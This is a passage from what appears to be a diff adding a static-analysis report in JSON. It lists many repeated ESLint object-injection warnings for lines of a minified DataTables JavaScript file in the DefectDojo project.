"dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 71, + "end_line": 71, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 72, + "end_line": 72, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 73, + "end_line": 73, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 74, + "end_line": 74, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 77, + "end_line": 77, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Function Call Object Injection Sink", + "message": "Function Call Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 79, + "end_line": 79, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 81, + "end_line": 81, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 82, + "end_line": 82, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 83, + "end_line": 83, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 84, + "end_line": 84, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 87, + "end_line": 87, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Function Call Object Injection Sink", + "message": "Function Call Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 88, + "end_line": 88, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 89, + "end_line": 89, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Variable Assigned to Object Injection Sink", + "message": "Variable Assigned to Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 90, + "end_line": 90, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 96, + "end_line": 96, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 97, + "end_line": 97, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 98, + "end_line": 98, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Variable Assigned to Object Injection Sink", + "message": "Variable Assigned to Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 56, + "end_line": 56, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 100, + "end_line": 100, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 101, + "end_line": 101, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Function Call Object Injection Sink", + "message": "Function Call Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 102, + "end_line": 102, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Function Call Object Injection Sink", + "message": "Function Call Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 103, + "end_line": 103, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Variable Assigned to Object Injection Sink", + "message": "Variable Assigned to Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 104, + "end_line": 104, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 105, + "end_line": 105, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 106, + "end_line": 106, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 674, + "end_line": 674, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 107, + "end_line": 107, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 108, + "end_line": 108, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Variable Assigned to Object Injection Sink", + "message": "Variable Assigned to Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 109, + "end_line": 109, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Variable Assigned to Object Injection Sink", + "message": "Variable Assigned to Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 110, + "end_line": 110, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Function Call Object Injection Sink", + "message": "Function Call Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 111, + "end_line": 111, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 112, + "end_line": 112, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 113, + "end_line": 113, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 114, + "end_line": 114, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 115, + "end_line": 115, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 116, + "end_line": 116, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 117, + "end_line": 117, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 122, + "end_line": 122, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": 